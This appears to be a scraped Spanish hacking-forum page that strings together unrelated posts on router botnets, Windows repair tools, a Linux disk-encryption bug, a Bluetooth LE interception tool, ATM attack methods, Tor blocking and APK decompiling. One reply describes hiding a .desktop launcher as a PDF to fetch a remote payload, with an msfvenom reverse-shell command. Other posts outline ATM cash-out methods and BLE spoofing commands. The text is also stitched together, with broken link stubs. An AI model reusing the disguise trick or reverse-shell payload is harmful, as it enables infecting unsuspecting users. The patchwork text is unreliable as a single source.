Los routers son los dispositivos de red más vulnerables ya que son dispositivos conectados directamente a Internet, sin ninguna capa de seguridad intermedia, especialmente en los entornos domésticos. Por ello, además de cambiar los credenciales de acceso, incluso desactivar el acceso remoto si no hacemos uso de él, es recomendable mantenerlos siempre actualizados con el último firmware para evitar que los piratas informáticos puedan comprometerlos aprovechando algún fallo del mismo, tal como ha ocurrido en Alemania.

Desde este fin de semana, casi un millón de routers domésticos pertenecientes a la compañía Deutsche Telekom, operador de Alemania con más de 20 millones de clientes, se han quedado sin servicio tras un ataque informático masivo que, según las primeras investigaciones, ha sido generado desde la botnet Mirai, botnet conocida por ser la responsable de bloquear medio Internet al atacar el mes pasado a Dyn.

Según parece, este ataque informático ha podido tener lugar porque los routers distribuidos por esta compañía, especialmente de la marca Speedport, tenían el puerto 7547 abierto y a la escucha de recibir comandos basados en los protocolos TR-069 y TR-064.

Aunque la investigación sigue en el aire, por el momento se sabe que los modelos que se han visto afectados son:

   

• Speedport W 921V
• Speedport W 723V Tipo B
• Eir D1000

Estos routers no solo proporcionaban acceso a Internet, sino que también estaban siendo utilizados para ofrecer telefonía fija y televisión, servicios que también han dejado de funcionar tras el ataque.

Este ataque no ha estado centralizado en una región concreta de Alemania, sino que se ha distribuido uniformemente por todo el país.



Mientras se arroja más luz sobre el caso, las compañías cuyos clientes se han visto afectados por este ataque informático recomiendan que estos apaguen sus routers, esperen 30 segundos y los vuelvan a encender. De esta manera, se descargará un nuevo firmware de emergencia desarrollado, precisamente, para solucionar este problema y, una vez instalado, el router debería volver a funcionar con normalidad, libre de la vulnerabilidad que ha dado lugar a este ataque a gran escala.

Desde VirusTotal ya han registrado las dos variantes del malware Mirai que han sido utilizadas en estos ataques:


   

• Mirai 24
• Mirai 14

Sin embargo, dado que el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, urge actualizar y protegerse de estos ataques ya que otros piratas informáticos podrían comenzar una campaña similar, tanto en el propio país germano como en otros países en todo el mundo. De igual forma, los expertos temen que en los próximos días estos u otros piratas ataquen otros modelos diferentes de routers, pudiendo llegar a dejar sin servicio a un número mucho mayor de usuarios.

Mientras se solucionan todos los problemas causados por este ataque informático, Deutsche Telekom está ofreciendo a todos sus clientes Internet móvil gratis, una buena compensación que, al menos, no dejará tirados a los usuarios afectados.



Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

Cita de: m4xLo único que no me funciona es que no muestra el icono pdf. He visto la ruta de "Icon" y es correcta.
Ya haré más pruebas en otra máquina Ubuntu.

Yo hice la prueba con Kali y funciona perfectamente. Intentalo con otro icono. También puedes probarlo de manera manual, es posible que así te de menos problemas.

Windows 10 incluye por defecto una serie de herramientas que nos ayudan a solucionar los posibles problemas con los que nos encontremos mientras utilizamos el sistema operativo, sin embargo, estas no siempre son capaces de solucionarlos todos y, en ocasiones, nos toca buscar y descargar aplicaciones de terceros que nos ayuden a solucionar estos problemas. Para facilitar esta tarea hemos creado un paquete de aplicaciones bajo el nombre "Windows 10 FixTools" en el que incluimos todo lo necesario para dar solución a prácticamente cualquier problema mientras utilizamos el sistema operativo.

Windows 10 FixTools es un paquete de aplicaciones que hemos recopilado desde SoftZone de manera que, en vez de descargar todas las aplicaciones por separado, podamos descargarlas todas juntas para poder recurrir a ellas siempre que lo necesitemos. Además, estas aplicaciones son totalmente gratuitas y no necesitan instalación, lo que nos va a permitir también llevarlas siempre con nosotros en una memoria USB.

---

A continuación, vamos a ver las aplicaciones que hemos decidido recopilar en nuestro pack. Como hemos dicho, todas las aplicaciones son seguras, totalmente gratuitas y se pueden ejecutar de forma portable sin necesidad de instalarlas en el ordenador.

• Windows Update FixIt Tool – Esta aplicación ha sido desarrollada por Microsoft para solucionar todos los problemas relacionados con Windows Update y permitirnos la correcta instalación de las actualizaciones cuando tengamos problemas al buscarlas, descargarlas o instalarlas.


• O&O Shut Up 10 – Como la privacidad es uno de los aspectos que más han preocupado a los usuarios, esta herramienta nos permite activar y desactivar fácilmente todas las funciones del sistema operativo, funciones que, de normal, no podemos configurar ni desactivar.


• FixWin – Esta aplicación nos permite arreglar varios errores aleatorios de Windows, de la tienda de aplicaciones y de Windows Update. Además, esta aplicación nos permite activar y desactivar determinadas características de Windows.


• Ultimate Windows Tweaker 4 – Una herramienta bastante más avanzada que las dos anteriores que nos permite, además de solucionar determinados problemas, tener el control sobre distintos aspectos del sistema operativo, como el menú contextual o la apariencia completa de Windows 10.


• Complete Internet Repair – Esta herramienta nos va a permitir solucionar prácticamente cualquier problema relacionado con Internet, desde problemas de conexión o DNS hasta problemas de configuración con alguna de las características básicas de Windows, como el cortafuegos o las conexiones VPN.

---

Como hemos dicho, las aplicaciones están descargadas desde sus correspondientes páginas web y subidas a nuestra cuenta personal de Mega. Todas ellas son totalmente gratuitas y se pueden ejecutar sin necesidad de instalarse en el ordenador, de forma portable.





Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hace unos días You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login corrió como la pólvora en redes sociales. En él se aconsejaba, paradójicamente, dejar de usar las redes sociales porque podrían afectar a tu trayectoria profesional, además de tener otras consecuencias negativas.

El caso es que a muchos se nos ha pasado por la cabeza alguna vez la idea de desconectar, de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, de no vivir tan pendientes de este universo digital. Para los que finalmente den el paso y tomen esa decisión, ahora una web te lo pone un poco más fácil.

La página web en cuestión se llama You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, y te permite eliminar tu presencia de Internet borrando las cuentas y perfiles de usuario que hayas creado para todo tipo de servicios online en unos pocos clics.

Es muy fácil de usar: sólo tienes que iniciar sesión con tu cuenta de Google, y en pocos segundos obtendrás un listado de cuentas en todo tipo de redes sociales y servicios online. Cada una de ellas tiene varios enlaces a su lado, que puedes usar para borrarte del servicio correspondiente, o para marcarlo como que lo quieres conservar. La eliminación de las cuentas en sí no se hace directamente en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, sino en la propia web de cada servicio.

De hecho, la web es útil no sólo para eliminar perfiles de usuario rápidamente, sino también para dar un repaso a todas esas cuentas que no recuerdas haber creado y que no has vuelto a usar nunca más desde el día que la diste de alta.


Deseat.me recuerda a otros servicios de "limpieza automatizada" similares que te ayudan a librarte de los peores elementos de Internet, como la publicidad o el spam. Un ejemplo de éstos es You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, una herramienta para desuscribirse masivamente de newsletters que ya no te interesan.

En cualquier caso, se trata de una utilidad interesante para repasar todas las cuentas de usuario que has creado, y cerrar definitivamente aquellas que no te interese mantener.



Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

Cita de: dragonayrecomendaciones ahora que ni con Linux estamos tranquilos?

Descargar contenido siempre de fuentes fiables y oficiales, evitar enlaces sospechosos, ejecutar los archivos en máquina virtual o sandbox...

Cita de: dragonayA lo que entendí en el sistema aparecerá como payload.pdf o payload.pdf .desktop??

Te equivocas, aparecerá un arvhivo .zip que contiene un archivo con el siguiente formáto:

"nombredelarchivo".pdf                             .desktop

En dicho archivo se incluye el payload.

---

De esta manera conseguimos obtener el archivo .desktop camuflado de forma manual y un poco rudimentaria, ahora veremos cómo se hace con LinDrop de manera más avanzada en cuatro sencillos pasos.

---

• 1: introducir el nombre para el archivo "PDF" (.desktop) que estará en el archivo ZIP.
• 2: introducir el nombre para el archivo ZIP.
• 3: introducir url para descarga remota del payload. Este se guardará en el directorio /tmp. Para ello podemos utilizar msfvenom:

Citarmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload

• 4: introducir PDF para mostrar al usuario.

---

Buenísimo @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, a favoritos 

Todavía no ha pasado un año desde que informamos de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que permitía saltarse esta contraseña al presionar 28 veces exactas la tecla de retroceso. Al hacerlo, se iniciaba un "Grub Rescue Shell" desde el que se podía acceder al equipo sin usar ninguna clave. Un bug descubierto por Ismael Ripoll y Héctor Marco que, precisamente, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

En esta ocasión, se trata de un fallo que permite tener acceso root en Linux con solo pulsar Intro durante 70 segundos de manera continuada y que afecta a casi todas las distribuciones Linux populares: Ubuntu, Fedora, Debian, Red Hat Enterprise Linux (RHEL), y SUSE Linux Enterprise Server (SLES) -los usuarios de Arch Linux, y Solus no se están viendo afectados.



Tal y como explican los citados investigadores en su blog, se trata de un problema de seguridad que tiene que ver con una vulnerabilidad You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login en la implementación de la utilidad Cryptsetup, que se usa para cifrar discos duros a través de Linux Unified Key Setup (LUKS), que es el sistema de cifrado estándar en un sistema operativo Linux.

El fallo radica en la forma en la que Cryptsetup maneja las contraseñas erróneas para el proceso de descifrado cuando el sistema arranca. En este caso, permite al usuario probar contraseñas múltiples veces. De hecho, aunque utilice los 93 intentos disponibles para introducirla, llega a una consola con privilegios root. Lo consigue dejándola en blanco y manteniendo pulsada la tecla de enter durante 70 segundos; momento a partir del cual tendrá acceso root a una consola initramfs (initial RAM file system).


La vulnerabilidad, por otra parte, se puede aprovechar de manera remota y brinda al atacante la opción de acceder y eliminar la información de todos nuestros discos, cifrados o no, mediante un ataque de fuerza bruta.

Esta vulnerabilidad permite una escalada de privilegios. O sea, puede usarse para almacenar un archivo ejecutable con SetUID bit activado. Posteriormente, un usuario local tendría la opción de ejecutarlo para escalar sus privilegios. Si el arranque no está protegido, sería posible también que un atacante reemplazase el kernel y la imagen initrd.




Solucionarlo, por fortuna y según apunta los investigadores, resulta relativamente sencillo. En primer lugar, pulsa la tecla de intro durante 70 segundos para comprobar si tu sistema es vulnerable. En caso de que así sea, consulta con tu proveedor de asistencia técnica para comprobar si existe un parche.

Y si este no se encuentra disponible, puedes detener el arranque cuando se alcance el límite de intentos que fijes con este comando:

    sed -i 's/GRUBCMDLINELINUXDEFAULT="/GRUBCMDLINELINUXDEFAULT="panic=5 /' /etc/default/grub grub-install

Fuente:www.genbeta.com

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login incorpora emparejamiento de dispositivos y encriptación de capa de enlace. Sin embargo, una cantidad significativa de dispositivos no implementa estas características. O no proporcionan seguridad de transmisión en absoluto, o aseguran por medios propios en capas de aplicación. Los vendedores prometen "cifrado de grado militar de 128 bits" y "nivel de seguridad sin precedentes", no dispuestos a compartir detalles técnicos. Hemos visto tales declaraciones antes, y muchas veces no resistieron a una evaluación profesional independiente y resultó ser "*snake oil". Ya es hora de verificar estas afirmaciones, ahora es posible con la ayuda de nuestra nueva herramienta de código abierto.

(*Snake oil: se refiere al producto de criptografía o seguridad que hace un exagerado anuncio de lo que es capaz de hacer, dando al usuario un falso sentido de la seguridad. Glosario: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login)

Compartimos varias vulnerabilidades ya identificadas cómo ejemplo. Esperamos que la comunidad aumente su número, ayudando a desarrollar las nuevas características de la herramienta, cooperando con los vendedores, y mejorando la seguridad para los usuarios finales.

---

Los dispositivos pueden ser atacados de varias maneras: desde la simple denegación de servicio, pasando por el spoofing, la interceptación de transmisión pasiva y activa, hasta el abuso de los servicios del dispositivo mal configurado. Los ataques pueden ser entre otros:

• Deegación de servicio
• Spoofing (falsas indicaciones, desactivar alarmas)
• Interceptación de datos (información personal, autenticación, etc.)
• Tomar el control sobre el dispositivo (abrir el bloqueo inteligente, modificar caracteristicas del hogar inteligente)

Puedes encontrar ejemplos de vulnerabilidades identificadas en el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

---

El ataque es más eficaz contra los dispositivos que no implementan las funciones de seguridad Bluetooth (emparejamiento). Hemos examinado un puñado de dispositivos, incluyendo:

• Relojes inteligentes
• Token de autenticación
• Punto de venta inteligente
• Cerraduras inteligentes
• Soluciones anti robo
• Automatización del hogar
• Buscadores inteligentes
• Sensores
• Balizas
• Varios gadgets.

Alrededor de 2 de 10 (sobre todo los relojes inteligentes) no utilizan las funciones de seguridad Bluetooth correctamente.

---

La funcionalidad de nuestra herramienta se probó en Raspberry Pi y otros sistemas Linux con adaptadores Bluetooth 4. Algunos de los ataques pueden realizarse utilizando un smartphone u otros dispositivos embebidos. Es técnicamente posible implementar el dispositivo atacante en un minúsculo módulo de tamaño baliza (unos pocos cm cuadrados), accionado por batería.

---

La herramienta crea una copia exacta del dispositivo atacado en la capa Bluetooth, a continuación engaña a la aplicación móvil para interpretar sus emisiones y conectarse a ella en lugar de al dispositivo original. Al mismo tiempo, mantiene la conexión activa al dispositivo, y le envía los datos intercambiados con la aplicación móvil. De esta manera, actuando como "Man-in-the-Middle", es posible interceptar y / o modificar las peticiones y respuestas transmitidas.

---

La mayoría de las aplicaciones móviles inician la conexión al dispositivo buscando paquetes publicitarios emitidos por el dispositivo. Por lo general, los dispositivos optimizan los intervalos de publicidad con el fin de minimizar el consumo de energía. El atacante sin embargo puede difundir los anuncios pertinentes con intervalos mínimos (mucho más rápido). La aplicación móvil interpretará la primera publicidad recibida, y en este caso probablemente será la falsa.

---

Actualmente, la herramienta funciona para dispositivos que no implementan el cifrado de la capa de enlace Bluetooth LE. Sin embargo, hay sorprendentemente muchos de estos dispositivos.

---

• El módulo central (ws-slave.js) escucha anuncios, escanea los servicios del dispositivo para clonar en "periféricos" y reenvía los mensajes de lectura/escritura/notificación intercambiados durante el ataque activo.


• El módulo "periférico" (advertise.js) carga la especificación de dispositivo (anuncio, servicios, características, descriptores) recogida por el módulo "central" y actúa como el dispositivo "emulador".


• Las funciones de gancho opcionales permiten manipular solicitudes y respuestas.


• Escáner de ayuda scout.js escanea para los dispositivos y crea los archivos de JSON con los anuncios y los servicios + características del dispositivo.


• Además, se adjunta un script de interfaz BlueRadios AT en standalone / blueRadiosCmd.js.

---

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

npm install gattacker

---

Ejecutar ambos componentes y configurar variables en config.env:

• NOBLE_HCI_DEVICE_ID: dispositivo noble ( "central", ws-slave)
• BLENO_HCI_DEVICE_ID: dispositivo bleno ( "periférico", anunciar)

Si ejecutas los módulos "centrales" y "periféricos" en cajas separadas con una sola interfaz BT4, puedes dejar los valores comentados.

• WS_SLAVE: Dirección IP de la caja ws-slave
• DEVICES_PATH: ruta para almacenar archivos json

---

Sudo node ws-slave

Se conecta al periférico de destino y actúa como servidor websocket.

Depurar:

DEBUG = ws-slave nodo sudo ws-slave

---

Escaneo de anuncios

node scan

Sin parámetros escanea para difundir anuncios y los registra como archivos json (.adv.json) en DEVICES_PATH.

Explorar servicios y características:

node scan <peripheral>

Explora los servicios y las características de los periféricos elegidos. Guarda la estructura de servicio del explorador en el archivo json (.srv.json) en DEVICES_PATH.

---

Para muchas aplicaciones es necesario clonar la dirección MAC del dispositivo original. Una herramienta de ayuda bdaddr de Bluez se proporciona en helpers/bdaddr.

cd helpers/bdaddr
make

wrapper script:

./mac_adv -a <advertisement_json_file> [ -s <services_json_file> ]

---

hciconfig <hci_interface> reset

---

---

---

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Para practicar, buscar y explotar vulnerabilidades XSS no es necesario un sistema operativo específico, lo puedes hacer con cualquiera.
Has mencionado la plataforma Web For Pentester, te recomiendo montarla en virtualbox, esta muy bien para practicar.

Si tienes algun error montandola en VirtualBox y no eres capaz de solucionarlo, puedes crear un post en esta sección.


Pd: tienes más opciones para practicar XSS:

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo, HATI 

---

Fuente: SniferLabs && Google

---

Método 1: un centro falso de procesamiento

Este método puede usarse si un atacante es capaz de acceder al cable que conecta el cajero con la red. Un hacker desconecta el cajero de la red del banco y luego lo conecta a un aparato que actúa como un centro falso de procesamiento.

La caja se utiliza para controlar la retirada de efectivo y envía comandos al cajero en los que se pide que se retire dinero de la bandeja seleccionada. ¡Voila! El atacante puede usar cualquier tarjeta o introducir cualquier código PIN, la transacción falsa parecería legítima. Video 1.

---

Método 2: un ataque remoto en varios cajeros automáticos

En este método se necesita a un infiltrado que trabaje en el banco. El delincuente obtiene (adquiere) de forma remota una clave utilizada para abrir el bastidor del cajero. Aunque esta clave no permita al atacante acceder a la retirada de dinero, el cable de red quedaría al descubierto. El hacker desconecta el cajero de la red del banco y conecta un aparato especial que envía todos los datos a su propio servidor.

A menudo, la red que se conecta al cajero no está segmentada y los propios cajeros pueden estar mal configurados. En este caso, con dicho dispositivo, un hacker podría comprometer varios cajeros a la vez, aunque el dispositivo malicioso solo esté conectado a uno de ellos.

El resto del ataque se lleva a cabo como hemos explicado antes. Se instala un centro falso de procesamiento en el servidor y el atacante obtiene el control total sobre el cajero. Utilizando cualquier tarjeta, el culpable puede retirar dinero del cajero, sin importar el modelo. Lo único que tienen que tener en común todos los cajeros para poder acceder a ellos es el protocolo utilizado para conectarlos al centro de procesamiento. Video 2.

---

Método 3: el ataque de la caja negra

Como en el método anteriormente descrito, el atacante obtiene la clave del bastidor del cajero y pone la máquina en modo de mantenimiento. Entonces, el hacker conecta la llamada caja negra al puerto USB expuesto. Una caja negra es un dispositivo que permite al hacker controlar el cajón del dinero.

Mientras el agresor altera el cajero, la pantalla muestra un mensaje como "en mantenimiento" o "afuera de servicio", aunque en realidad, es posible sacar dinero de este. Además, la caja negra puede ser controlada de forma inalámbrica vía smartphone. Un hacker solamente tiene que pulsar un botón en la pantalla para conseguir dinero en metálico y deshacerse de la caja negra para esconder las pruebas. Video 3.

---

Método 4: un ataque malware

Hay dos formas de infectar un cajero con malware: insertando un dispositivo USB con malware (eso conlleva tener la clave para abrir el bastidor del cajero) o infectando la máquina de forma remota, todo esto tras haber comprometido la red del banco.
Si el cajero no está protegido contra el malware y no emplea listas blancas, un hacker puede hacer que el malware envíe comandos al cajero y que este expenda dinero. El ataque podría repetirse hasta que el dinero del cajero se agote. Video 4.

---

Afortunadamente, no todos los cajeros son hackeables. Los ataques descritos anteriormente son factibles solo si algo no está bien configurado. Podría ser el caso de, por ejemplo, una red de banco no segmentada o de un cajero que no requiera una autenticación cuando el software intercambia datos con el hardware, o no haya listas blancas para las apps, o el cable de red esté al alcance del atacante.

Desafortunadamente, este tipo de problemas son muy comunes. Por ejemplo, permiten a un hacker infectar una serie de cajeros con el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Los expertos de Kaspersky Lab están siempre disponibles para ayudar a los bancos a solucionar este tipo de problemas: podemos ofrecer servicios de consultoría o estudiar la infraestructura del banco, analizando su resistencia a los ataques.




Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Creo que te refieres a un troyano.

En la biblioteca de malwares del foro puedes encontrar varios: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Sin duda las redes TOR han adquirido un protagonismo considerable en estos últimos años. Ya debemos saber que no siempre TOR, se usa para realizar actos delictivos sino también para evadir censuras en países autoritarios y dónde la democracia y libertad de expresión es un lujo escaso.

No obstante, nosotros siempre nos centramos en las posibilidades que puedan dar las redes TOR, tanto ofensivamente como defensivamente.

Hoy toca ser defensivos, y vamos a ver como poder parar de forma simple, visitas desde redes TOR a un servicio apache nuestro, publicado en Internet. Las reglas pararán cualquier intento de conexión pero utilizaremos apache como sonda de prueba.

La idea me surgió hace tiempo pero hoy he podido plasmarla en el artículo. Y es que entrando en pequeños debates de como mejorar servicios de Firewalls conocidos, con un gran profesional al que aprovecho y le mando saludos, me propuse hacer algo básico para trasladar mi idea y/o ponerla en práctica.

Empecemos pues.

La idea: No permitir accesos desde redes TOR a nuestro servidor y de paso, bloquear IPs que hayan sido reportadas o estén listadas en repositorios dedicados a recopilar esto.

¿Qué vamos a usar?

   
• IPTables
• IPSet
• Feeds de IPs/Maliciosas y TOR
• Script base de trick77(Github: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login)

Lo primero que haremos será instalarnos IPSet. IPSet es un "añadido" del kernel de Linux. Permite configurar diferentes IPs, MACs, puertos, etc... para cargarlas desde IPTables. El por qué de usarlo es porque permite cargar miles de direcciones IP y solamente cargarla con una línea de IPTables. Sino usáramos esto, tendría que ser el proceso a "manopla" y es inviable a no ser que tengáis mucho tiempo u os montéis un script, que es lo que hacemos nosotros.

El proceso es el de siempre para instalar en Debian/Kali:

apt-get install ipset

Una vez hecho esto, procederemos a la descarga de un script que funciona a las mil maravillas, además de completo, de trick77. Con este programita solucionaremos gran parte del "problema" por lo que seguiremos parte del README aunque haremos algunas aclaraciones para que sea todo 100% operativo así como alguna modificación del código inicial.

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Guardamos en una ruta "popular" de nuestro equipo o VM aunque lo ideal para ponerlo en producción es meterlo en la ruta /usr/local/sbin/.Es un script de Shell de Bash por lo que la extesión será .sh.

Una vez decidido dónde queremos tener alojado nuestro script vamos a otorgarle permisos de ejecución con:

chmod +x /ruta/torblock/script.sh

Creamos una carpeta nueva dónde alojaremos la carpeta principal de IPSet:

mkdir -p /etc/ipset-blacklist

A continuación procedemos a descargar el fichero de configuración que contiene las premisas en las que se basarán nuestros bloqueos.

Podemos descargarlo de: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y lo situaremos en /etc/ipset-blacklist/

Decir que el fichero de configuración ipset-blacklist.conf contendrá feeds de diferentes tipos de IPs (maliciosas, TOR, spam, etc...)



Estas líneas pueden comentarse para que no realicen la descarga del listado de IPs que queramos excluir. Personalmente, creo que no está de más tener toda la lista en funcionamiento para bloquear la mayoría de IPs que su origen sea dudoso. Nosotros vamos a dejarlo como está, aunque si queréis cambiar o añadir otros servicios, también es válido.

Hecho esto, procederemos a ejecutar el script para que empiece a descargar listados de IPs y trasladarlos a nuestro fichero ipset-blacklist.restore

Usaremos:

./torblock.sh /etc/ipset-blacklist/ipset-blacklist.conf

En la anterior captura se aprecia la ejecución del script que, como decimos, descarga listados de IPs tanto TOR, maliciosas, de SPAM, etcétera... También se ocupa automáticamente de crear el contenedor IPSet, que es un almacenamiento que albergará dichas IPs. Básicamente emplea un comando para crear este contenedor parecido a:

ipset create blacklist hash:net hashsize 4096

También el script si analizáis el código, añade automáticamente esto:

iptables -I INPUT 1 -m set –match-set blacklist src -j DROP

Qué es la regla IPTables que llama al contenedor "blacklist" y hace un bloqueo total del contenedor, el cual, como venimos diciendo, contiene las miles de IPs maliciosas.



En esta captura se aprecia una pequeña muestra de la cabecera del fichero que contiene las IPs que hemos descargado de los repositorios.

Hemos llamado el script de trick77 como You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para que sea más identificativo a la hora de identificarlo y/o configurarlo de forma automática. No obstante hemos modificado algunas premisas para adaptarse mejor a los aplicativos en dónde tenemos esto testeando. La siguiente ruta que aparece junto a la llamada del script, es indicarle la configuración que tomará el script para su ejecución.

Importante: Una de las modificaciones que hemos hecho en el código es añadir una simple línea llamada:
   

ipset restore < /etc/ipset-blacklist/ip-blacklist.restore

¿Por qué?¿Qué hace esto?

Por la sencilla razón de que si lo integramos, al cronearlo, automáticamente también se actualiza el "contenedor" IPSet. Lo que hace esta línea de código es coger del fichero .restore las nuevas IPs y refrescar la lista.

¿Y si quiero anular el efecto de bloqueo?

iptables –D INPUT X donde X es el número del listado de las reglas que tengas. Nosotros en el servidor de pruebas tenemos 1, pues sería 1 solo. Otros servidores pueden tener cientos.


Recopilemos:

Tenemos un script llamado You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que nos actualiza las IPs maliciosas (TOR, Spam, etc...) nos genera el contenedor IPSet donde irán dichas IPs y generará una regla IPTables para bloquear.


Mejoras:

• Meter el script de actualización en /etc/rc.local para asegurar su ejecución al inicio del sistema.
• Crontab: Meterle una línea al Cron para que cada X tiempo se ejecute y tenga actualizadas las listas de IPs

Directorio de pruebas:




Visitando el sitio con Firefox con IP Pública:




Visitando el sitio con TorBrowser:




Con esto ya no hay excusa para impedir accesos a nuestros servidores o sitios publicados en Internet. Si no necesitamos/interesa visitas desde redes de anonimato ¿por qué permitirle el acceso?

Estamos, de paso, realizando uno de los pasos importantes a la hora de securizar cualquier dispositivo/servidor, que es reducir la superficie de exposición de ataques.

Espero que os haya gustado y sobre todo, espero que podáis utilizar este artículo para consultas si os interesa tener algo así.



Autor:ManoloGaritmo
Fuente:hacking-etico.com

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

aquí tienes info sobre el tema de root: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (en inglés).

Espero que te sea de ayuda.

Cita de: redeszone.net"El curso que imparte la Linux Foundation se titula "Fundamentos de Administración de Sistemas Linux" y se le conoce como LFS201. Este curso es 100% online y tiene una duración aproximada de entre 40 y 50 horas. Durante el mismo se imparten al usuario los conocimientos necesarios para saber lo básico sobre la administración de servidores Linux y se le prepara para poder obtener la certificación correspondiente como administrador de sistemas."

---

Acceso al curso: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Temario del curso en español: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Apuntes de apoyo para el curso: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Un saludo, HATI 

---

Una de las cosas buenas que tienen las aplicaciones para android, es que permiten que se examine el código fuente, sin que la licencia que tiene importe demasiado. Evidentemente, de hacerlo y querer modificarlas, no se podrian distribuir (supuestamente), ya que esto iria, de ser privativas, en contra del copyright. Es posible que ni siquiera sea legal examinarlo, ya se sabe cómo son con estas cosas. Pero cómo no pueden evitarlo, al lío.

Las órdenes estarán pensadas para usar en Ubuntu 16.04. "Oh dios mío, Ubuntu, que te ha pasado, tu antes molabas." La vida. El motivo de usarla es que encontré la manera de hacerlo apuntando a Ubuntu concretamente, y dado que lo he hecho usando docker, me da bastante igual la distribución. En teoria deberia ir con cualquier distro, adaptando los paquetes a cómo se llamen en esa. Por cierto, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login está el link al repositorio git en el que tengo el Dockerfile para poder construir esa imagen. Si os da igual el cómo, podéis seguir el README y en 10 minutos estar descompilando apk. Para las que tienen curiosidad en la vida, ahí va.

Desde el propio Ubuntu, primero de todo actualizar e instalar todos los paquetes que seran necesarios. Es posible que varios ya lo estén:

su -c "apt-get update; apt-get install  --no-install-recommends ca-certificates net-tools openssh-server unzip openjdk-8-jdk mercurial gradle patch wget"

Ahora, se descargaran dos herramientas básicas para darle al tema. La primera, dex2jar. Se descarga, descomprime, enlace simbolico y permisos de ejecución.

cd ~/
wget https://sourceforge.net/projects/dex2jar/files/dex2jar-2.0.zip/download -O dex2jar.zip
unzip dex2jar.zip
rm dex2jar.zip

Ahí va la primera. Esta herramienta lo que hace es pasar del formato .dex, que es lo que usa la máquina virtual java de Android (Dalvik) y lo pasa a un formato jar, lo que permite que se ejecute o se manipule con openjdk.

La segunda herramienta es procyon (luego me quejo de los nombres de mis programas), que es un conjunto de herramientas de metaprogramación (su definición). Tiene un montón de cosas que nos dan muy igual, sólo nos interesa una de ellas, el decompiler. Ahora se clona el repositorio.

cd ~/
hg clone https://bitbucket.org/mstrobel/procyon
cd procyon

Un pequeño parón aquí. Hay que quitar todas las líneas en las que salga "sign" del archivo build.gradle. Lo podéis hacer a mano o podéis guardar el siguiente bloque de código con el nombre de parche en el directorio procyon y aplicarlo con patch < parche en el directorio del programa.

diff -r 1aa0bd29339b build.gradle
 a/build.gradle      Sat May 21 11:20:43 2016 -0400
 b/build.gradle      Tue May 31 12:11:49 2016 +0000
@@ -59,7 +59,6 @@

 subprojects {
     apply plugin: 'maven'
-    apply plugin: 'signing'

     archivesBaseName = 'procyon-' + it.name.split("\\.")[1].toLowerCase()

@@ -91,10 +90,6 @@
             archives sourcesJar
         }

-        signing {
-            sign configurations.archives
-        }
-
         uploadArchives {
             repositories.mavenDeployer {
                 beforeDeployment { MavenDeployment deployment ->

Solo queda compilar el programa. Puede que de algún warning, es un poco quejica. Pero si no es más que eso, deberia funcionar correctamente:

gradle fatJar

Y con esto, ya podemos empezar a descompilar apk. El proceso viene a ser, pasar los .dex a .jar y descompilarlo sin más. Las órdenes serian:

# aquí tenemos el apk, por ejemplo
cd ~/apk
mv com.ejemplo.apk com.ejemplo.apk.zip
unzip com.ejemplo.apk.zip
dex2jar classes.dex
mkdir ~/src
java -jar ~/procyon/build/Procyon.Decompiler/libs/procyon-decompiler-0.5.32.jar -jar classes-dex2jar.jar -o ~/src

